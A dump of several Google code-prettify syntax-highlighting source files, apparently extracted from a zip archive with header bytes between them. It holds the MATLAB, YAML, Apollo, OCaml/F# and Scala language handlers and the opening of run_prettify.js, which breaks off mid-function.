    'addedvarplot|andrewsplot|anova(?:1|2|n)|ansaribradley|aoctool|barttest|bbdesign|beta(?:cdf|fit|inv|like|pdf|rnd|stat)|bino(?:cdf|fit|inv|pdf|rnd|stat)|biplot|bootci|bootstrp|boxplot|candexch|candgen|canoncorr|capability|capaplot|caseread|casewrite|categorical|ccdesign|cdfplot|chi2(?:cdf|gof|inv|pdf|rnd|stat)|cholcov|Classification(?:BaggedEnsemble|Discriminant(?:\.(?:fit|make|template))?|Ensemble|KNN(?:\.(?:fit|template))?|PartitionedEnsemble|PartitionedModel|Tree(?:\.(?:fit|template))?)|classify|classregtree|cluster|clusterdata|cmdscale|combnk|Compact(?:Classification(?:Discriminant|Ensemble|Tree)|Regression(?:Ensemble|Tree)|TreeBagger)|confusionmat|controlchart|controlrules|cophenet|copula(?:cdf|fit|param|pdf|rnd|stat)|cordexch|corr|corrcov|coxphfit|createns|crosstab|crossval|cvpartition|datasample|dataset|daugment|dcovary|dendrogram|dfittool|disttool|dummyvar|dwtest|ecdf|ecdfhist|ev(?:cdf|fit|inv|like|pdf|rnd|stat)|ExhaustiveSearcher|exp(?:cdf|fit|inv|like|pdf|rnd|stat)|factoran|fcdf|ff2n|finv|fitdist|fitensemble|fpdf|fracfact|fracfactgen|friedman|frnd|fstat|fsurfht|fullfact|gagerr|gam(?:cdf|fit|inv|like|pdf|rnd|stat)|GeneralizedLinearModel(?:\.fit)?|geo(?:cdf|inv|mean|pdf|rnd|stat)|gev(?:cdf|fit|inv|like|pdf|rnd|stat)|gline|glmfit|glmval|glyphplot|gmdistribution(?:\.fit)?|gname|gp(?:cdf|fit|inv|like|pdf|rnd|stat)|gplotmatrix|grp2idx|grpstats|gscatter|haltonset|harmmean|hist3|histfit|hmm(?:decode|estimate|generate|train|viterbi)|hougen|hyge(?:cdf|inv|pdf|rnd|stat)|icdf|inconsistent|interactionplot|invpred|iqr|iwishrnd|jackknife|jbtest|johnsrnd|KDTreeSearcher|kmeans|knnsearch|kruskalwallis|ksdensity|kstest|kstest2|kurtosis|lasso|lassoglm|lassoPlot|leverage|lhsdesign|lhsnorm|lillietest|LinearModel(?:\.fit)?|linhyptest|linkage|logn(?:cdf|fit|inv|like|pdf|rnd|stat)|lsline|mad|mahal|maineffectsplot|manova1|manovacluster|mdscale|mhsample|mle|mlecov|mnpdf|mnrfit|mnrnd|mnrval|moment|multcompare|multivarichart|mvn(?:cdf|pdf|rnd)|mvregress|mvregresslike|mvt(?:cdf|pdf|rnd)|NaiveBayes(?:\.fit)?|nan(?:cov|max|mean|median|min|std|sum|var)|nbin(?:cdf|fit|inv|pdf|rnd|stat)|ncf(?:cdf|inv|pdf|rnd|stat)|nct(?:cdf|inv|pdf|rnd|stat)|ncx2(?:cdf|inv|pdf|rnd|stat)|NeighborSearcher|nlinfit|nlintool|nlmefit|nlmefitsa|nlparci|nlpredci|nnmf|nominal|NonLinearModel(?:\.fit)?|norm(?:cdf|fit|inv|like|pdf|rnd|stat)|normplot|normspec|ordinal|outlierMeasure|parallelcoords|paretotails|partialcorr|pcacov|pcares|pdf|pdist|pdist2|pearsrnd|perfcurve|perms|piecewisedistribution|plsregress|poiss(?:cdf|fit|inv|pdf|rnd|tat)|polyconf|polytool|prctile|princomp|ProbDist(?:Kernel|Parametric|UnivKernel|UnivParam)?|probplot|procrustes|qqplot|qrandset|qrandstream|quantile|randg|random|randsample|randtool|range|rangesearch|ranksum|rayl(?:cdf|fit|inv|pdf|rnd|stat)|rcoplot|refcurve|refline|regress|Regression(?:BaggedEnsemble|Ensemble|PartitionedEnsemble|PartitionedModel|Tree(?:\.(?:fit|template))?)|regstats|relieff|ridge|robustdemo|robustfit|rotatefactors|rowexch|rsmdemo|rstool|runstest|sampsizepwr|scatterhist|sequentialfs|signrank|signtest|silhouette|skewness|slicesample|sobolset|squareform|statget|statset|stepwise|stepwisefit|surfht|tabulate|tblread|tblwrite|tcdf|tdfread|tiedrank|tinv|tpdf|TreeBagger|treedisp|treefit|treeprune|treetest|treeval|trimmean|trnd|tstat|ttest|ttest2|unid(?:cdf|inv|pdf|rnd|stat)|unif(?:cdf|inv|it|pdf|rnd|stat)|vartest(?:2|n)?|wbl(?:cdf|fit|inv|like|pdf|rnd|stat)|wblplot|wishrnd|x2fx|xptread|zscore|ztest'
  ].join("|");
  var imageFunctions = [
    'adapthisteq|analyze75info|analyze75read|applycform|applylut|axes2pix|bestblk|blockproc|bwarea|bwareaopen|bwboundaries|bwconncomp|bwconvhull|bwdist|bwdistgeodesic|bweuler|bwhitmiss|bwlabel|bwlabeln|bwmorph|bwpack|bwperim|bwselect|bwtraceboundary|bwulterode|bwunpack|checkerboard|col2im|colfilt|conndef|convmtx2|corner|cornermetric|corr2|cp2tform|cpcorr|cpselect|cpstruct2pairs|dct2|dctmtx|deconvblind|deconvlucy|deconvreg|deconvwnr|decorrstretch|demosaic|dicom(?:anon|dict|info|lookup|read|uid|write)|edge|edgetaper|entropy|entropyfilt|fan2para|fanbeam|findbounds|fliptform|freqz2|fsamp2|fspecial|ftrans2|fwind1|fwind2|getheight|getimage|getimagemodel|getline|getneighbors|getnhood|getpts|getrangefromclass|getrect|getsequence|gray2ind|graycomatrix|graycoprops|graydist|grayslice|graythresh|hdrread|hdrwrite|histeq|hough|houghlines|houghpeaks|iccfind|iccread|iccroot|iccwrite|idct2|ifanbeam|im2bw|im2col|im2double|im2int16|im2java2d|im2single|im2uint16|im2uint8|imabsdiff|imadd|imadjust|ImageAdapter|imageinfo|imagemodel|imapplymatrix|imattributes|imbothat|imclearborder|imclose|imcolormaptool|imcomplement|imcontour|imcontrast|imcrop|imdilate|imdisplayrange|imdistline|imdivide|imellipse|imerode|imextendedmax|imextendedmin|imfill|imfilter|imfindcircles|imfreehand|imfuse|imgca|imgcf|imgetfile|imhandles|imhist|imhmax|imhmin|imimposemin|imlincomb|imline|immagbox|immovie|immultiply|imnoise|imopen|imoverview|imoverviewpanel|impixel|impixelinfo|impixelinfoval|impixelregion|impixelregionpanel|implay|impoint|impoly|impositionrect|improfile|imputfile|impyramid|imreconstruct|imrect|imregconfig|imregionalmax|imregionalmin|imregister|imresize|imroi|imrotate|imsave|imscrollpanel|imshow|imshowpair|imsubtract|imtool|imtophat|imtransform|imview|ind2gray|ind2rgb|interfileinfo|interfileread|intlut|ippl|iptaddcallback|iptcheckconn|iptcheckhandle|iptcheckinput|iptcheckmap|iptchecknargin|iptcheckstrs|iptdemos|iptgetapi|iptGetPointerBehavior|iptgetpref|ipticondir|iptnum2ordinal|iptPointerManager|iptprefs|iptremovecallback|iptSetPointerBehavior|iptsetpref|iptwindowalign|iradon|isbw|isflat|isgray|isicc|isind|isnitf|isrgb|isrset|lab2double|lab2uint16|lab2uint8|label2rgb|labelmatrix|makecform|makeConstrainToRectFcn|makehdr|makelut|makeresampler|maketform|mat2gray|mean2|medfilt2|montage|nitfinfo|nitfread|nlfilter|normxcorr2|ntsc2rgb|openrset|ordfilt2|otf2psf|padarray|para2fan|phantom|poly2mask|psf2otf|qtdecomp|qtgetblk|qtsetblk|radon|rangefilt|reflect|regionprops|registration\.metric\.(?:MattesMutualInformation|MeanSquares)|registration\.optimizer\.(?:OnePlusOneEvolutionary|RegularStepGradientDescent)|rgb2gray|rgb2ntsc|rgb2ycbcr|roicolor|roifill|roifilt2|roipoly|rsetwrite|std2|stdfilt|strel|stretchlim|subimage|tformarray|tformfwd|tforminv|tonemap|translate|truesize|uintlut|viscircles|warp|watershed|whitepoint|wiener2|xyz2double|xyz2uint16|ycbcr2rgb'
  ].join("|");
  var optimFunctions = [
    'bintprog|color|fgoalattain|fminbnd|fmincon|fminimax|fminsearch|fminunc|fseminf|fsolve|fzero|fzmult|gangstr|ktrlink|linprog|lsqcurvefit|lsqlin|lsqnonlin|lsqnonneg|optimget|optimset|optimtool|quadprog'
  ].join("|");

  // identifiers: variable/function name, or a chain of variable names joined by dots (obj.method, struct.field1.field2, etc..)
  // valid variable names (start with letter, and contains letters, digits, and underscores).
  // we match "xx.yy" as a whole so that if "xx" is plain and "yy" is not, we dont get a false positive for "yy"
  //var reIdent = '(?:[a-zA-Z][a-zA-Z0-9_]*)';
  //var reIdentChain = '(?:' + reIdent + '(?:\.' + reIdent + ')*' + ')';

  // patterns that always start with a known character. Must have a shortcut string.
  var shortcutStylePatterns = [
    // whitespaces: space, tab, carriage return, line feed, line tab, form-feed, non-break space
    [PR.PR_PLAIN, /^[ \t\r\n\v\f\xA0]+/, null, " \t\r\n\u000b\u000c\u00a0"],

    // block comments
    //TODO: chokes on nested block comments
    //TODO: false positives when the lines with %{ and %} contain non-spaces
    //[PR.PR_COMMENT, /^%(?:[^\{].*|\{(?:%|%*[^\}%])*(?:\}+%?)?)/, null],
    [PR.PR_COMMENT, /^%\{[^%]*%+(?:[^\}%][^%]*%+)*\}/, null],

    // single-line comments
    [PR.PR_COMMENT, /^%[^\r\n]*/, null, "%"],

    // system commands
    [PR_SYSCMD, /^![^\r\n]*/, null, "!"]
  ];

  // patterns that will be tried in order if the shortcut ones fail. May have shortcuts.
  var fallthroughStylePatterns = [
    // line continuation
    [PR_LINE_CONTINUATION, /^\.\.\.\s*[\r\n]/, null],

    // error message
    [PR_ERROR, /^\?\?\? [^\r\n]*/, null],

    // warning message
    [PR_WARNING, /^Warning: [^\r\n]*/, null],

    // command prompt/output
    //[PR_CODE_OUTPUT, /^>>\s+[^\r\n]*[\r\n]{1,2}[^=]*=[^\r\n]*[\r\n]{1,2}[^\r\n]*/, null],    // full command output (both loose/compact format): `>> EXP\nVAR =\n VAL`
    [PR_CODE_OUTPUT, /^>>\s+/, null],      // only the command prompt `>> `
    [PR_CODE_OUTPUT, /^octave:\d+>\s+/, null],  // Octave command prompt `octave:1> `

    // identifier (chain) or closing-parenthesis/brace/bracket, and IS followed by transpose operator
    // this way we dont misdetect the transpose operator ' as the start of a string
    ["lang-matlab-operators", /^((?:[a-zA-Z][a-zA-Z0-9_]*(?:\.[a-zA-Z][a-zA-Z0-9_]*)*|\)|\]|\}|\.)')/, null],

    // identifier (chain), and NOT followed by transpose operator
    // this must come AFTER the "is followed by transpose" step (otherwise it chops the last char of identifier)
    ["lang-matlab-identifiers", /^([a-zA-Z][a-zA-Z0-9_]*(?:\.[a-zA-Z][a-zA-Z0-9_]*)*)(?!')/, null],

    // single-quoted strings: allow for escaping with '', no multilines
    //[PR.PR_STRING, /(?:(?<=(?:\(|\[|\{|\s|=|;|,|:))|^)'(?:[^']|'')*'(?=(?:\)|\]|\}|\s|=|;|,|:|~|<|>|&|-|\+|\*|\.|\^|\|))/, null],  // string vs. transpose (check before/after context using negative/positive lookbehind/lookahead)
    [PR.PR_STRING, /^'(?:[^']|'')*'/, null],  // "'"

    // floating point numbers: 1, 1.0, 1i, -1.1E-1
    [PR.PR_LITERAL, /^[+\-]?\.?\d+(?:\.\d*)?(?:[Ee][+\-]?\d+)?[ij]?/, null],

    // parentheses, braces, brackets
    [PR.PR_TAG, /^(?:\{|\}|\(|\)|\[|\])/, null],  // "{}()[]"

    // other operators
    [PR.PR_PUNCTUATION, /^(?:<|>|=|~|@|&|;|,|:|!|\-|\+|\*|\^|\.|\||\\|\/)/, null]
  ];

  var identifiersPatterns = [
    // list of keywords (`iskeyword`)
    [PR.PR_KEYWORD, /^\b(?:break|case|catch|classdef|continue|else|elseif|end|for|function|global|if|otherwise|parfor|persistent|return|spmd|switch|try|while)\b/, null],

    // some specials variables/constants
    [PR_CONSTANT, /^\b(?:true|false|inf|Inf|nan|NaN|eps|pi|ans|nargin|nargout|varargin|varargout)\b/, null],

    // some data types
    [PR.PR_TYPE, /^\b(?:cell|struct|char|double|single|logical|u?int(?:8|16|32|64)|sparse)\b/, null],

    // commonly used builtin functions from core MATLAB and a few popular toolboxes
    [PR_FUNCTION, new RegExp('^\\b(?:' + coreFunctions + ')\\b'), null],
    [PR_FUNCTION_TOOLBOX, new RegExp('^\\b(?:' + statsFunctions + ')\\b'), null],
    [PR_FUNCTION_TOOLBOX, new RegExp('^\\b(?:' + imageFunctions + ')\\b'), null],
    [PR_FUNCTION_TOOLBOX, new RegExp('^\\b(?:' + optimFunctions + ')\\b'), null],

    // plain identifier (user-defined variable/function name)
    [PR_IDENTIFIER, /^[a-zA-Z][a-zA-Z0-9_]*(?:\.[a-zA-Z][a-zA-Z0-9_]*)*/, null]
  ];

  var operatorsPatterns = [
    // forward to identifiers to match
    ["lang-matlab-identifiers", /^([a-zA-Z][a-zA-Z0-9_]*(?:\.[a-zA-Z][a-zA-Z0-9_]*)*)/, null],

    // parentheses, braces, brackets
    [PR.PR_TAG, /^(?:\{|\}|\(|\)|\[|\])/, null],  // "{}()[]"

    // other operators
    [PR.PR_PUNCTUATION, /^(?:<|>|=|~|@|&|;|,|:|!|\-|\+|\*|\^|\.|\||\\|\/)/, null],

    // transpose operators
    [PR_TRANSPOSE, /^'/, null]
  ];

  PR.registerLangHandler(
    PR.createSimpleLexer([], identifiersPatterns),
    ["matlab-identifiers"]
  );
  PR.registerLangHandler(
    PR.createSimpleLexer([], operatorsPatterns),
    ["matlab-operators"]
  );
  PR.registerLangHandler(
    PR.createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns),
    ["matlab"]
  );
})(window['PR']);
PK!�����#it_sanctum/js/prettify/lang-yaml.jsnu&1i�/**
 * @license
 * Copyright (C) 2015 ribrdb @ code.google.com
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */


// Contributed by ribrdb @ code.google.com

/**
 * @fileoverview
 * Registers a language handler for YAML.
 *
 * @author ribrdb
 */

PR['registerLangHandler'](
  PR['createSimpleLexer'](
    [
      [PR['PR_PUNCTUATION'], /^[:|>?]+/, null, ':|>?'],
      [PR['PR_DECLARATION'],  /^%(?:YAML|TAG)[^#\r\n]+/, null, '%'],
      [PR['PR_TYPE'], /^[&]\S+/, null, '&'],
      [PR['PR_TYPE'], /^!\S*/, null, '!'],
      [PR['PR_STRING'], /^"(?:[^\\"]|\\.)*(?:"|$)/, null, '"'],
      [PR['PR_STRING'], /^'(?:[^']|'')*(?:'|$)/, null, "'"],
      [PR['PR_COMMENT'], /^#[^\r\n]*/, null, '#'],
      [PR['PR_PLAIN'], /^\s+/, null, ' \t\r\n']
    ],
    [
      [PR['PR_DECLARATION'], /^(?:---|\.\.\.)(?:[\r\n]|$)/],
      [PR['PR_PUNCTUATION'], /^-/],
      [PR['PR_KEYWORD'], /^[\w-]+:[ \r\n]/],
      [PR['PR_PLAIN'], /^\w+/]
    ]), ['yaml', 'yml']);
PK!Cg�^K
K
%it_sanctum/js/prettify/lang-apollo.jsnu&1i�/**
 * @license
 * Copyright (C) 2009 Onno Hommes.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for the AGC/AEA Assembly Language as described
 * at http://virtualagc.googlecode.com
 * <p>
 * This file could be used by goodle code to allow syntax highlight for
 * Virtual AGC SVN repository or if you don't want to commonize
 * the header for the agc/aea html assembly listing.
 *
 * @author ohommes@alumni.cmu.edu
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // A line comment that starts with ;
         [PR['PR_COMMENT'],     /^#[^\r\n]*/, null, '#'],
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"']
        ],
        [
         [PR['PR_KEYWORD'], /^(?:ADS|AD|AUG|BZF|BZMF|CAE|CAF|CA|CCS|COM|CS|DAS|DCA|DCOM|DCS|DDOUBL|DIM|DOUBLE|DTCB|DTCF|DV|DXCH|EDRUPT|EXTEND|INCR|INDEX|NDX|INHINT|LXCH|MASK|MSK|MP|MSU|NOOP|OVSK|QXCH|RAND|READ|RELINT|RESUME|RETURN|ROR|RXOR|SQUARE|SU|TCR|TCAA|OVSK|TCF|TC|TS|WAND|WOR|WRITE|XCH|XLQ|XXALQ|ZL|ZQ|ADD|ADZ|SUB|SUZ|MPY|MPR|MPZ|DVP|COM|ABS|CLA|CLZ|LDQ|STO|STQ|ALS|LLS|LRS|TRA|TSQ|TMI|TOV|AXT|TIX|DLY|INP|OUT)\s/,null],
         [PR['PR_TYPE'], /^(?:-?GENADR|=MINUS|2BCADR|VN|BOF|MM|-?2CADR|-?[1-6]DNADR|ADRES|BBCON|[SE]?BANK\=?|BLOCK|BNKSUM|E?CADR|COUNT\*?|2?DEC\*?|-?DNCHAN|-?DNPTR|EQUALS|ERASE|MEMORY|2?OCT|REMADR|SETLOC|SUBRO|ORG|BSS|BES|SYN|EQU|DEFINE|END)\s/,null],
         // A single quote possibly followed by a word that optionally ends with
         // = ! or ?.
         [PR['PR_LITERAL'],
          /^\'(?:-*(?:\w|\\[\x21-\x7e])(?:[\w-]*|\\[\x21-\x7e])[=!?]?)?/],
         // Any word including labels that optionally ends with = ! or ?.
         [PR['PR_PLAIN'],
          /^-*(?:[!-z_]|\\[\x21-\x7e])(?:[\w-]*|\\[\x21-\x7e])[=!?]?/i],
         // A printable non-space non-special character
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r \xA0()\"\\\';]+/]
        ]),
    ['apollo', 'agc', 'aea']);
PK!�9����!it_sanctum/js/prettify/lang-ml.jsnu&1i�/**
 * @license
 * Copyright (C) 2008 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for OCaml, SML, F# and similar languages.
 *
 * Based on the lexical grammar at
 * http://research.microsoft.com/en-us/um/cambridge/projects/fsharp/manual/spec.html#_Toc270597388
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace is made up of spaces, tabs and newline characters.
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // #if ident/#else/#endif directives delimit conditional compilation
         // sections
         [PR['PR_COMMENT'],
          /^#(?:if[\t\n\r \xA0]+(?:[a-z_$][\w\']*|``[^\r\n\t`]*(?:``|$))|else|endif|light)/i,
          null, '#'],
         // A double or single quoted, possibly multi-line, string.
         // F# allows escaped newlines in strings.
         [PR['PR_STRING'],      /^(?:\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)|\'(?:[^\'\\]|\\[\s\S])(?:\'|$))/, null, '"\'']
        ],
        [
         // Block comments are delimited by (* and *) and may be
         // nested. Single-line comments begin with // and extend to
         // the end of a line.
         // TODO: (*...*) comments can be nested.  This does not handle that.
         [PR['PR_COMMENT'],     /^(?:\/\/[^\r\n]*|\(\*[\s\S]*?\*\))/],
         [PR['PR_KEYWORD'],     /^(?:abstract|and|as|assert|begin|class|default|delegate|do|done|downcast|downto|elif|else|end|exception|extern|false|finally|for|fun|function|if|in|inherit|inline|interface|internal|lazy|let|match|member|module|mutable|namespace|new|null|of|open|or|override|private|public|rec|return|static|struct|then|to|true|try|type|upcast|use|val|void|when|while|with|yield|asr|land|lor|lsl|lsr|lxor|mod|sig|atomic|break|checked|component|const|constraint|constructor|continue|eager|event|external|fixed|functor|global|include|method|mixin|object|parallel|process|protected|pure|sealed|trait|virtual|volatile)\b/],
         // A number is a hex integer literal, a decimal real literal, or in
         // scientific notation.
         [PR['PR_LITERAL'],
          /^[+\-]?(?:0x[\da-f]+|(?:(?:\.\d+|\d+(?:\.\d*)?)(?:e[+\-]?\d+)?))/i],
         [PR['PR_PLAIN'],       /^(?:[a-z_][\w']*[!?#]?|``[^\r\n\t`]*(?:``|$))/i],
         // A printable non-space non-special character
         [PR['PR_PUNCTUATION'], /^[^\t\n\r \xA0\"\'\w]+/]
        ]),
    ['fs', 'ml']);
PK!�σ?

$it_sanctum/js/prettify/lang-scala.jsnu&1i�/**
 * @license
 * Copyright (C) 2010 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Scala.
 *
 * Derived from http://lampsvn.epfl.ch/svn-repos/scala/scala-documentation/trunk/src/reference/SyntaxSummary.tex
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double or single quoted string 
          // or a triple double-quoted multi-line string.
         [PR['PR_STRING'],
          /^(?:"(?:(?:""(?:""?(?!")|[^\\"]|\\.)*"{0,3})|(?:[^"\r\n\\]|\\.)*"?))/,
          null, '"'],
         [PR['PR_LITERAL'],     /^`(?:[^\r\n\\`]|\\.)*`?/, null, '`'],
         [PR['PR_PUNCTUATION'], /^[!#%&()*+,\-:;<=>?@\[\\\]^{|}~]+/, null,
          '!#%&()*+,-:;<=>?@[\\]^{|}~']
        ],
        [
         // A symbol literal is a single quote followed by an identifier with no
         // single quote following
         // A character literal has single quotes on either side
         [PR['PR_STRING'],      /^'(?:[^\r\n\\']|\\(?:'|[^\r\n']+))'/],
         [PR['PR_LITERAL'],     /^'[a-zA-Z_$][\w$]*(?!['$\w])/],
         [PR['PR_KEYWORD'],     /^(?:abstract|case|catch|class|def|do|else|extends|final|finally|for|forSome|if|implicit|import|lazy|match|new|object|override|package|private|protected|requires|return|sealed|super|throw|trait|try|type|val|var|while|with|yield)\b/],
         [PR['PR_LITERAL'],     /^(?:true|false|null|this)\b/],
         [PR['PR_LITERAL'],     /^(?:(?:0(?:[0-7]+|X[0-9A-F]+))L?|(?:(?:0|[1-9][0-9]*)(?:(?:\.[0-9]+)?(?:E[+\-]?[0-9]+)?F?|L?))|\\.[0-9]+(?:E[+\-]?[0-9]+)?F?)/i],
         // Treat upper camel case identifiers as types.
         [PR['PR_TYPE'],        /^[$_]*[A-Z][_$A-Z0-9]*[a-z][\w$]*/],
         [PR['PR_PLAIN'],       /^[$a-zA-Z_][\w$]*/],
         [PR['PR_COMMENT'],     /^\/(?:\/.*|\*(?:\/|\**[^*/])*(?:\*+\/?)?)/],
         [PR['PR_PUNCTUATION'], /^(?:\.+|\/)/]
        ]),
    ['scala']);
PK!:ј�>�>&it_sanctum/js/prettify/run_prettify.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * <div style="white-space: pre">
 * Looks at query parameters to decide which language handlers and style-sheets
 * to load.
 *
 * Query Parameter     Format           Effect                        Default
 * +------------------+---------------+------------------------------+--------+
 * | autorun=         | true | false  | If true then prettyPrint()   | "true" |
 * |                  |               | is called on page load.      |        |
 * +------------------+---------------+------------------------------+--------+
 * | lang=            | language name | Loads the language handler   | Can    |
 * |                  |               | named "lang-<NAME>.js".      | appear |
 * |                  |               | See available handlers at    | many   |
 * |                  |               | https://github.com/google/   | times. |
 * |                  |               | code-prettify/tree/master/   |        |
 * |                  |               | src                          |        |
 * +------------------+---------------+------------------------------+--------+
 * | skin=            | skin name     | Loads the skin stylesheet    | none.  |
 * |                  |               | named "<NAME>.css".          |        |
 * |                  |               | https://cdn.rawgit.com/      |        |
 * |                  |               | google/code-prettify/master/ |        |
 * |                  |               | styles/index.html            |        |
 * +------------------+---------------+------------------------------+--------+
 * | callback=        | JS identifier | When "prettyPrint" finishes  | none   |
 * |                  |               | window.exports[js_ident] is  |        |
 * |                  |               | called.                      |        |
 * |                  |               | The callback must be under   |        |
 * |                  |               | exports to reduce the risk   |        |
 * |                  |               | of XSS via query parameter   |        |
 * |                  |               | injection.                   |        |
 * +------------------+---------------+------------------------------+--------+
 *
 * Exmaples
 * .../prettify.js?lang=css&skin=sunburst
 *   1. Loads the CSS language handler which can be used to prettify CSS
 *      stylesheets, HTML <style> element bodies and style="..." attributes
 *      values.
 *   2. Loads the sunburst.css stylesheet instead of the default prettify.css
 *      stylesheet.
 *      A gallery of stylesheets is available at
 *      https://cdn.rawgit.com/google/code-prettify/master/styles/index.html
 *   3. Since autorun=false is not specified, calls prettyPrint() on page load.
 * </div>
 */

/**
* @typedef {!Array.<number|string>}
* Alternating indices and the decorations that should be inserted there.
* The indices are monotonically increasing.
*/
var DecorationsT;

/**
* @typedef {!{
*   sourceNode: !Element,
*   pre: !(number|boolean),
*   langExtension: ?string,
*   numberLines: ?(number|boolean),
*   sourceCode: ?string,
*   spans: ?(Array.<number|Node>),
*   basePos: ?number,
*   decorations: ?DecorationsT
* }}
* <dl>
*  <dt>sourceNode<dd>the element containing the source
*  <dt>sourceCode<dd>source as plain text
*  <dt>pre<dd>truthy if white-space in text nodes
*     should be considered significant.
*  <dt>spans<dd> alternating span start indices into source
*     and the text node or element (e.g. {@code <BR>}) corresponding to that
*     span.
*  <dt>decorations<dd>an array of style classes preceded
*     by the position at which they start in job.sourceCode in order
*  <dt>basePos<dd>integer position of this.sourceCode in the larger chunk of
*     source.
* </dl>
*/
var JobT;

/**
* @typedef {!{
*   sourceCode: string,
*   spans: !(Array.<number|Node>)
* }}
* <dl>
*  <dt>sourceCode<dd>source as plain text
*  <dt>spans<dd> alternating span start indices into source
*     and the text node or element (e.g. {@code <BR>}) corresponding to that
*     span.
* </dl>
*/
var SourceSpansT;

/** @define {boolean} */
var IN_GLOBAL_SCOPE = false;

(function () {
  "use strict";

  var win = window;
  var doc = document;
  var root = doc.documentElement;
  var head = doc['head'] || doc.getElementsByTagName("head")[0] || root;

  // From http://javascript.nwbox.com/ContentLoaded/contentloaded.js
  // Author: Diego Perini (diego.perini at gmail.com)
  // Summary: cross-browser wrapper for DOMContentLoaded
  // Updated: 20101020
  // License: MIT
  // Version: 1.2
  function contentLoaded(callback) {
    var addEventListener = doc['addEventListener'];
    var done = false, top = true,
        add = addEventListener ? 'addEventListener' : 'attachEvent',
        rem = addEventListener ? 'removeEventListener' : 'detachEvent',
        pre = addEventListener ? '' : 'on',

        init = function(e) {
          if (e.type == 'readystatechange' && doc.readyState != 'complete') {
            return;
          }
          (e.type == 'load' ? win : doc)[rem](pre + e.type, init, false);
          if (!done && (done = true)) { callback.call(win, e.type || e); }
        },

        poll = function() {
          try {
            root.doScroll('left');
          } catch(e) {
            win.setTimeout(poll, 50);
            return;
          }
          init('poll');
        };

    if (doc.readyState == 'complete') {
      callback.call(win, 'lazy');
    } else {
      if (doc.createEventObject && root.doScroll) {
        try { top = !win.frameElement; } catch(e) { }
        if (top) { poll(); }
      }
      doc[add](pre + 'DOMContentLoaded', init, false);
      doc[add](pre + 'readystatechange', init, false);
      win[add](pre + 'load', init, false);
    }
  }

  // Given a list of URLs to stylesheets, loads the first that loads without
  // triggering an error event.
  function loadStylesheetsFallingBack(stylesheets) {
    var n = stylesheets.length;
    function load(i) {
      if (i === n) { return; }
      var link = doc.createElement('link');
      link.rel = 'stylesheet';
      link.type = 'text/css';
      if (i + 1 < n) {
        // http://pieisgood.org/test/script-link-events/ indicates that many
        // versions of IE do not support onerror on <link>s, though
        // http://msdn.microsoft.com/en-us/library/ie/ms535848(v=vs.85).aspx
        // indicates that recent IEs do support error.
        link.error = link.onerror = function () { load(i + 1); };
      }
      link.href = stylesheets[i];
      head.appendChild(link);
    }
    load(0);
  }

  var scriptQuery = '';
  // Look for the <script> node that loads this script to get its parameters.
  // This starts looking at the end instead of just considering the last
  // because deferred and async scripts run out of order.
  // If the script is loaded twice, then this will run in reverse order.
  var scripts = doc.getElementsByTagName('script');
  for (var i = scripts.length; --i >= 0;) {
    var script = scripts[i];
    var match = script.src.match(
        /^[^?#]*\/run_prettify\.js(\?[^#]*)?(?:#.*)?$/);
    if (match) {
      scriptQuery = match[1] || '';
      // Remove the script from the DOM so that multiple runs at least run
      // multiple times even if parameter sets are interpreted in reverse
      // order.
      script.parentNode.removeChild(script);
      break;
    }
  }

  // Pull parameters into local variables.
  var autorun = true;
  var langs = [];
  var skins = [];
  var callbacks = [];
  scriptQuery.replace(
      /[?&]([^&=]+)=([^&]+)/g,
      function (_, name, value) {
